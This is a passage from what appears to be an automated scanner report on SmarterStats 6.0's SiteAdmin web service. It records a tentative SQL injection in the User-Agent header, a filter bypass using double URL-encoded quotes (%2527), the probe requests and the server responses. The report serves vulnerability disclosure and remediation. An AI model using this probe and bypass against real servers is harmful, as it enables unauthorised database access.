<td><input class="frmInput" type="text" size="50" name="authUserName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authPassword:</td>
<td><input class="frmInput" type="text" size="50" name="authPassword"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">SiteID:</td>
<td><input class="frmInput" type="text" size="50" name="SiteID"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">DestServerID:</td>
<td><input class="frmInput" type="text" size="50" name="DestServerID"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">DestSmarterLogPath:</td>
<td><input class="frmInput" type="text" size="50" name="DestSmarterLogPath"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">DestLogFilePath:</td>
<td><input class="frmInput" type="text" size="50" name="DestLogFilePath"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">DestExportPath:</td>
<td><input class="frmInput" type="text" size="50" name="DestExportPath"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">DestExportPathURL:</td>
<td><input class="frmInput" type="text" size="50" name="DestExportPathURL"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">CopyFiles:</td>
<td><input class="frmInput" type="text" size="50" name="CopyFiles"></td>
</tr>

<tr>
<td></td>
<td align="right"> <input type="submit" value="Invoke" class="button"></td>
</tr>
</table>


</form>
<span>
<h3>SOAP 1.1</h3>
<p>The following is a sample SOAP 1.1 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>
SOAPAction: "http://www.smartertools.com/smarterstats/SiteAdmin.asmx/MoveSite"

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;MoveSite xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DestServerID&gt;<font class=value>int</font>&lt;/DestServerID&gt;
&lt;DestSmarterLogPath&gt;<font class=value>string</font>&lt;/DestSmarterLogPath&gt;
&lt;DestLogFilePath&gt;<font class=value>string</font>&lt;/DestLogFilePath&gt;
&lt;DestExportPath&gt;<font class=value>string</font>&lt;/DestExportPath&gt;
&lt;DestExportPathURL&gt;<font class=value>string</font>&lt;/DestExportPathURL&gt;
&lt;CopyFiles&gt;<font class=value>boolean</font>&lt;/CopyFiles&gt;
&lt;/MoveSite&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;MoveSiteResponse xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;MoveSiteResult&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/MoveSiteResult&gt;
&lt;/MoveSiteResponse&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>
</span>

<span>
<h3>SOAP 1.2</h3>
<p>The following is a sample SOAP 1.2 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;MoveSite xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DestServerID&gt;<font class=value>int</font>&lt;/DestServerID&gt;
&lt;DestSmarterLogPath&gt;<font class=value>string</font>&lt;/DestSmarterLogPath&gt;
&lt;DestLogFilePath&gt;<font class=value>string</font>&lt;/DestLogFilePath&gt;
&lt;DestExportPath&gt;<font class=value>string</font>&lt;/DestExportPath&gt;
&lt;DestExportPathURL&gt;<font class=value>string</font>&lt;/DestExportPathURL&gt;
&lt;CopyFiles&gt;<font class=value>boolean</font>&lt;/CopyFiles&gt;
&lt;/MoveSite&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;MoveSiteResponse xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;MoveSiteResult&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/MoveSiteResult&gt;
&lt;/MoveSiteResponse&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>
</span>

<span>
<h3>HTTP GET</h3>
<p>The following is a sample HTTP GET request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>GET /Services/SiteAdmin.asmx/MoveSite?<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>SiteID</font>=<font class=value>string</font>&amp;<font class=key>DestServerID</font>=<font class=value>string</font>&amp;<font class=key>DestSmarterLogPath</font>=<font class=value>string</font>&amp;<font class=key>DestLogFilePath</font>=<font class=value>string</font>&amp;<font class=key>DestExportPath</font>=<font class=value>string</font>&amp;<font class=key>DestExportPathURL</font>=<font class=value>string</font>&amp;<font class=key>CopyFiles</font>=<font class=value>string</font> HTTP/1.1
Host: localhost
</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;GenericResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/GenericResult&gt;</pre>
</span>

<span>
<h3>HTTP POST</h3>
<p>The following is a sample HTTP POST request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx/MoveSite HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: <font class=value>length</font>

<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>SiteID</font>=<font class=value>string</font>&amp;<font class=key>DestServerID</font>=<font class=value>string</font>&amp;<font class=key>DestSmarterLogPath</font>=<font class=value>string</font>&amp;<font class=key>DestLogFilePath</font>=<font class=value>string</font>&amp;<font class=key>DestExportPath</font>=<font class=value>string</font>&amp;<font class=key>DestExportPathURL</font>=<font class=value>string</font>&amp;<font class=key>CopyFiles</font>=<font class=value>string</font></pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;GenericResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/GenericResult&gt;</pre>
</span>

</span>









</body>
</html>

2.16. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/SiteAdmin.asmx

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /Services/SiteAdmin.asmx?op=AddSiteWithFTP2 HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 1

HTTP/2.0 500 Internal Server Error
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:03:31 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6785
Connection: Close

<html>
<head>
<title>Collection was modified; enumeration operation may not execute.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Collection was modified; enumeration operation may not execute.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.InvalidOperationException: Collection was modified; enumeration operation may not execute.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

The source code that generated this unhandled exception can only be shown when compiled in debug mode. To enable this, please follow one of the below steps, then request the URL:<br><br>1. Add a &quot;Debug=true&quot; directive at the top of the file that generated the error. Example:<br><br> &nbsp;&nbsp;&lt;%@ Page Language=&quot;C#&quot; Debug=&quot;true&quot; %&gt;<br><br>or:<br><br>2) Add the following section to the configuration file of your application:<br><br>&lt;configuration&gt;<br> &nbsp;&nbsp;&nbsp;&lt;system.web&gt;<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;compilation debug=&quot;true&quot;/&gt;<br> &nbsp;&nbsp;&nbsp;&lt;/system.web&gt;<br>&lt;/configuration&gt;<br><br> Note that this second technique will cause all files within a given application to be compiled in debug mode. The first technique will cause only that particular file to be compiled in debug mode.<br><br>Important: Running applications in debug mode does incur a memory/performance overhead. You should make sure that an application has debugging disabled before deploying into production scenario.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[InvalidOperationException: Collection was modified; enumeration operation may not execute.]
System.Collections.HashtableEnumerator.MoveNext() +12630115
System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile) +536
System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas) +204
System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +190
System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +75
ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e) +2222
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +25
System.Web.UI.Control.LoadRecursive() +95
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2760
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1

</font>

</body>
</html>
<!--
[InvalidOperationException]: Collection was modified; enumeration operation may not execute.
at System.Collections.Hashtable.HashtableEnumerator.MoveNext()
at System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile)
at System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas)
at System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type &#39;System.Web.HttpUnhandledException&#39; was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.Services.Protocols.DocumentationServerProtocol.WriteReturns(Object[] returnValues, Stream outputStream)
[InvalidOperationException]: The XML Web service help page encountered an internal error.
at System.Web.Services.Protocols.WebServiceHandler.WriteException(Exception e)
at System.Web.Services.Protocols.WebServiceHandler.CoreProcessRequest()
at System.Web.Services.Protocols.SyncSessionlessHandler.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
-->

Request 2

GET /Services/SiteAdmin.asmx?op=AddSiteWithFTP2 HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:03:33 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 25993
Connection: Close



<html>

<head><link rel="alternate" type="text/xml" href="/Services/SiteAdmin.asmx?disco" />

<style type="text/css">

       BODY { color: #000000; background-color: white; font-family: Verdana; margin-left: 0px; margin-top: 0px; }
       #content { margin-left: 30px; font-size: .70em; padding-bottom: 2em; }
       A:link { color: #336699; font-weight: bold; text-decoration: underline; }
       A:visited { color: #6699cc; font-weight: bold; text-decoration: underline; }
       A:active { color: #336699; font-weight: bold; text-decoration: underline; }
       A:hover { color: cc3300; font-weight: bold; text-decoration: underline; }
       P { color: #000000; margin-top: 0px; margin-bottom: 12px; font-family: Verdana; }
       pre { background-color: #e5e5cc; padding: 5px; font-family: Courier New; font-size: x-small; margin-top: -5px; border: 1px #f0f0e0 solid; }
       td { color: #000000; font-family: Verdana; font-size: .7em; }
       h2 { font-size: 1.5em; font-weight: bold; margin-top: 25px; margin-bottom: 10px; border-top: 1px solid #003366; margin-left: -15px; color: #003366; }
       h3 { font-size: 1.1em; color: #000000; margin-left: -15px; margin-top: 10px; margin-bottom: 10px; }
       ul { margin-top: 10px; margin-left: 20px; }
       ol { margin-top: 10px; margin-left: 20px; }
       li { margin-top: 10px; color: #000000; }
       font.value { color: darkblue; font: bold; }
       font.key { color: darkgreen; font: bold; }
       font.error { color: darkred; font: bold; }
       .heading1 { color: #ffffff; font-family: Tahoma; font-size: 26px; font-weight: normal; background-color: #003366; margin-top: 0px; margin-bottom: 0px; margin-left: -30px; padding-top: 10px; padding-bottom: 3px; padding-left: 15px; width: 105%; }
       .button { background-color: #dcdcdc; font-family: Verdana; font-size: 1em; border-top: #cccccc 1px solid; border-bottom: #666666 1px solid; border-left: #cccccc 1px solid; border-right: #666666 1px solid; }
       .frmheader { color: #000000; background: #dcdcdc; font-family: Verdana; font-size: .7em; font-weight: normal; border-bottom: 1px solid #dcdcdc; padding-top: 2px; padding-bottom: 2px; }
       .frmtext { font-family: Verdana; font-size: .7em; margin-top: 8px; margin-bottom: 0px; margin-left: 32px; }
       .frmInput { font-family: Verdana; font-size: 1em; }
       .intro { margin-left: -15px; }

</style>

<title>
   SiteAdmin Web Service
</title></head>

<body>

<div id="content">

<p class="heading1">SiteAdmin</p><br>





<span>
<p class="intro">Click <a href="SiteAdmin.asmx">here</a> for a complete list of operations.</p>
<h2>AddSiteWithFTP2</h2>
<p class="intro">Adds a site with ftp logs to the MRS.</p>

<h3>Test</h3>

To test the operation using the HTTP POST protocol, click the 'Invoke' button.



<form target="_blank" action='http://localhost:9999/Services/SiteAdmin.asmx/AddSiteWithFTP2' method="POST">

<table cellspacing="0" cellpadding="4" frame="box" bordercolor="#dcdcdc" rules="none" style="border-collapse: collapse;">
<tr>
   <td class="frmHeader" background="#dcdcdc" style="border-right: 2px solid white;">Parameter</td>
   <td class="frmHeader" background="#dcdcdc">Value</td>
</tr>


<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authUserName:</td>
<td><input class="frmInput" type="text" size="50" name="authUserName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authPassword:</td>
<td><input class="frmInput" type="text" size="50" name="authPassword"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">soUserName:</td>
<td><input class="frmInput" type="text" size="50" name="soUserName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">soPassword:</td>
<td><input class="frmInput" type="text" size="50" name="soPassword"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">soFirstName:</td>
<td><input class="frmInput" type="text" size="50" name="soFirstName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">soLastName:</td>
<td><input class="frmInput" type="text" size="50" name="soLastName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ServerID:</td>
<td><input class="frmInput" type="text" size="50" name="ServerID"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">SiteID:</td>
<td><input class="frmInput" type="text" size="50" name="SiteID"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">DomainName:</td>
<td><input class="frmInput" type="text" size="50" name="DomainName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">LogFormat:</td>
<td><input class="frmInput" type="text" size="50" name="LogFormat"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">LogWildcard:</td>
<td><input class="frmInput" type="text" size="50" name="LogWildcard"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">LogDaysBeforeDelete:</td>
<td><input class="frmInput" type="text" size="50" name="LogDaysBeforeDelete"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">SmarterLogDirectory:</td>
<td><input class="frmInput" type="text" size="50" name="SmarterLogDirectory"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">SmarterLogMonthsBeforeDelete:</td>
<td><input class="frmInput" type="text" size="50" name="SmarterLogMonthsBeforeDelete"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ExportPath:</td>
<td><input class="frmInput" type="text" size="50" name="ExportPath"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ExportPathURL:</td>
<td><input class="frmInput" type="text" size="50" name="ExportPathURL"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">TimeZoneIndex:</td>
<td><input class="frmInput" type="text" size="50" name="TimeZoneIndex"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">Directory:</td>
<td><input class="frmInput" type="text" size="50" name="Directory"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ProxyType:</td>
<td><input class="frmInput" type="text" size="50" name="ProxyType"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ProxyAddress:</td>
<td><input class="frmInput" type="text" size="50" name="ProxyAddress"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ProxyPort:</td>
<td><input class="frmInput" type="text" size="50" name="ProxyPort"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ProxyUserName:</td>
<td><input class="frmInput" type="text" size="50" name="ProxyUserName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ProxyPassword:</td>
<td><input class="frmInput" type="text" size="50" name="ProxyPassword"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">Server:</td>
<td><input class="frmInput" type="text" size="50" name="Server"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">Port:</td>
<td><input class="frmInput" type="text" size="50" name="Port"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">Username:</td>
<td><input class="frmInput" type="text" size="50" name="Username"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">Password:</td>
<td><input class="frmInput" type="text" size="50" name="Password"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">IntervalHours:</td>
<td><input class="frmInput" type="text" size="50" name="IntervalHours"></td>
</tr>

<tr>
<td></td>
<td align="right"> <input type="submit" value="Invoke" class="button"></td>
</tr>
</table>


</form>
<span>
<h3>SOAP 1.1</h3>
<p>The following is a sample SOAP 1.1 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>
SOAPAction: "http://www.smartertools.com/smarterstats/SiteAdmin.asmx/AddSiteWithFTP2"

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;AddSiteWithFTP2 xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;soUserName&gt;<font class=value>string</font>&lt;/soUserName&gt;
&lt;soPassword&gt;<font class=value>string</font>&lt;/soPassword&gt;
&lt;soFirstName&gt;<font class=value>string</font>&lt;/soFirstName&gt;
&lt;soLastName&gt;<font class=value>string</font>&lt;/soLastName&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;Directory&gt;<font class=value>string</font>&lt;/Directory&gt;
&lt;ProxyType&gt;<font class=value>string</font>&lt;/ProxyType&gt;
&lt;ProxyAddress&gt;<font class=value>string</font>&lt;/ProxyAddress&gt;
&lt;ProxyPort&gt;<font class=value>int</font>&lt;/ProxyPort&gt;
&lt;ProxyUserName&gt;<font class=value>string</font>&lt;/ProxyUserName&gt;
&lt;ProxyPassword&gt;<font class=value>string</font>&lt;/ProxyPassword&gt;
&lt;Server&gt;<font class=value>string</font>&lt;/Server&gt;
&lt;Port&gt;<font class=value>int</font>&lt;/Port&gt;
&lt;Username&gt;<font class=value>string</font>&lt;/Username&gt;
&lt;Password&gt;<font class=value>string</font>&lt;/Password&gt;
&lt;IntervalHours&gt;<font class=value>int</font>&lt;/IntervalHours&gt;
&lt;/AddSiteWithFTP2&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;AddSiteWithFTP2Response xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;AddSiteWithFTP2Result&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/AddSiteWithFTP2Result&gt;
&lt;/AddSiteWithFTP2Response&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>
</span>

<span>
<h3>SOAP 1.2</h3>
<p>The following is a sample SOAP 1.2 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;AddSiteWithFTP2 xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;soUserName&gt;<font class=value>string</font>&lt;/soUserName&gt;
&lt;soPassword&gt;<font class=value>string</font>&lt;/soPassword&gt;
&lt;soFirstName&gt;<font class=value>string</font>&lt;/soFirstName&gt;
&lt;soLastName&gt;<font class=value>string</font>&lt;/soLastName&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
